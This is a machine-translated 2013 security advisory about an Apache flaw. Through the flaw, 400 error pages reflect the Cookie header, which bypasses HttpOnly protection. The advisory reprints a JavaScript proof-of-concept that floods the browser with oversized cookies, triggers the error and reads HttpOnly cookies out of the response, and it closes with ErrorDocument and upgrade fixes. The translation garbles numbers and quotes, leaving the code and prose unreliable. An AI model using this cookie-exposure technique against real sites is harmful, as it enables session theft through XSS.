Apache HttpOnly Cookie XSS cross-site vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201338386
Type myhack58
Reporter 佚名
Modified 2013-04-19T00:00:00


Many programs and some commercial or Mature open-source cms article system in order to preventingxssto steal the user cookie issue, are generally used to cookie coupled with the httponly attribute, to prohibit the direct to use js to get the user's cookie, thereby reducingxssharm, and this problem just can be used to bypass cookie for the httponly attribute.

With chrome open a site, and F12 to open the developer tools, find the console enter the following code and hit Enter:

> // http://www.exploit-db.com/exploits/18442/ function setCookies (good) { // Construct string for cookie value var str = ""; for (var i=0; i< 8 1 9; i++) { str += "x"; } // Set cookies for (i = 0; i < 1 0; i++) { // Expire evil cookie if (good) { var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1). toUTCString()+"; path=/;"; } // Set evil cookie else { var cookie = "xss"+i+"="+str+";path=/"; } document. cookie = cookie; } } function makeRequest() { setCookies(); function parseCookies () { var cookie_dict = {}; // Only react on 4 0 0 status if (xhr. readyState === 4 && xhr. status === 4 0 0) { // Replace newlines and match <pre> content var content = xhr. responseText. replace(/\r|\n/g,"). match(/<pre>(.+)& lt;\/pre>/); if (content. length) { // Remove Cookie: prefix content = content[1]. replace("Cookie: ", ""); var cookies = content. replace(/xss\d=x+;?/ g, "). split(/;/g); // Add cookies to object for (var i=0; i<cookies. length; i++) { var s_c = cookies[i]. split('=',2); cookie_dict[s_c[0]] = s_c[1]; } } // Unset malicious cookies setCookies(true); alert(JSON. stringify(cookie_dict)); } } // Make XHR request var xhr = new XMLHttpRequest(); xhr. onreadystatechange = parseCookies; xhr. open("GET", "/", true); xhr. send(null); } makeRequest();

You can see gorgeous 4 0 0 error contains the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

Repair solutions:

Apache official provide 4 types of error handling methods http://httpd.apache.org/docs/2.0/mod/core.html#errordocument as

In the event of a problem or error, Apachecan be configured to do one of four things,

1. output asimple hardcoded error message output a simple blunt the error code information 2. output acustomized message output a piece of information 3. redirect to alocal URL-path to handle the problem/error Steering of a local custom page 4. redirect to an external URL to handle theproblem/error steering an external URL

After testing, The for 4 0 error 0 only method 2 is valid, return the package won't include the cookie content

Apache configuration:

ErrorDocument400 "security test"

Of course, upgrade apache to the latest also available: to.

Reference: http://httpd.apache.org/security/vulnerabilities_22.html